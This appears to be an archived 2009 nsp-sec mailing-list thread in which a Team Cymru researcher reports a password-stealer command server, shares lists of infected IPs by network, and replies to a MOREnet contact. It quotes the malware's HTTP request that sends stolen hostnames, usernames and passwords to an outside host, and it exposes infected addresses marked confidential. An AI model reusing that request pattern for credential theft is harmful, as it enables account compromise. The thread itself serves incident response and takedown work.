[nsp-sec] 130K+ Infected Ips on ~3600 ASNs
Stephen Gill
gillsr at cymru.com
Thu Oct 1 17:04:05 EDT 2009
Hi Beth,
My apologies. After filtering out DNS for your AS this one is the guy
causing the ruckus:
http://www.cymru.com/nsp-sec/Owned/stealer/as2572.txt
2572 | 204.184.112.80 | 204.184.0.0/17 | US | arin |
1994-11-04 | U 2009/10/01 14:40:29.056683 | MORENET - Missouri Research and
Education Network (MOREnet)
Connections look like this:
U 2009/10/01 14:14:47.015091 204.184.112.80:23982 -> 76.73.37.250:7007
Plenty more timestamps available if needed.
-- steve
On 10/1/09 11:40 AM, "Young, Beth A." <youngba at more.net> wrote:
> ----------- nsp-security Confidential --------
>
> Partial ACK for 2572.
>
> Of the 4 IP addresses listed, 3 are DNS servers. The other is a NAT address
> that probably has a DNS server behind it.
>
> Beth
>
>
> Beth Young, CISSP
> MOREnet Security
> 1-800-509-6673
> http://www.more.net/security
>
>
>
>
>> -----Original Message-----
>> From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-
>> bounces at puck.nether.net] On Behalf Of Stephen Gill
>> Sent: Thursday, October 01, 2009 12:48 PM
>> To: NSP-SEC List
>> Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs
>>
>> ----------- nsp-security Confidential --------
>>
>> Hi Team,
>>
>> This password stealer head end IP appears to be quite busy:
>>
>> 76.73.37.250
>>
>> We're working w/ the ISP on takedown, however in the meantime here is a
>> list
>> of 130K+ infected Ips seen talking to it primarily via TCP 80
>> (reporting
>> stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
>> takedown to last forver because they can likely re-route via DNS.
>>
>> ASN list:
>> https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
>>
>> Infected IP list:
>> https://www.cymru.com/nsp-sec/Owned/stealer/
>> eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
>>
>> Timestamps in UTC.
>>
>> Some clarification on the formatting:
>>
>> 3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-
>> GATEWAYS -
>> Massachusetts Institute of Technology
>>
>> The timestamp column will begin with a U or a T. U is for UDP, T for
>> TCP.
>> When possible we've preferred to list out a T if we have seen any TCP
>> 80
>> traffic from the client IP in question.
>>
>> It looks like the malware on the client may choose its source IP
>> address
>> since we noticed some RFC 1918 traffic so it is possible the UDP data
>> will
>> not match in all cases. I cannot guarantee that the UDP traffic is not
>> part
>> of some type of actual software but it sure looks suspicious. Here is
>> a
>> public URL for reference:
>>
>> http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
>>
>> As there is UDP involved we cannot guarantee that there are 0 spoofed
>> Ips,
>> but on the TCP side that is another matter.
>>
>> HTTP credential stealing looks something like this:
>>
>> GET
>> /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USER
>> NAME&
>> p=STOLEN_PASSWORD HTTP/1.1
>> User-Agent: Mozilla/4.0 (compatible).
>> Host: hotshows.org.
>> .
>>
>>
>> Cheers,
>> -- steve
>>
>> --
>> Stephen Gill, Chief Scientist, Team Cymru
>> http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
>>
>>
>>
>>
>> _______________________________________________
>> nsp-security mailing list
>> nsp-security at puck.nether.net
>> https://puck.nether.net/mailman/listinfo/nsp-security
>>
>> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
>> security
>> community. Confidentiality is essential for effective Internet security
>> counter-measures.
>> _______________________________________________
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
More information about the nsp-security
mailing list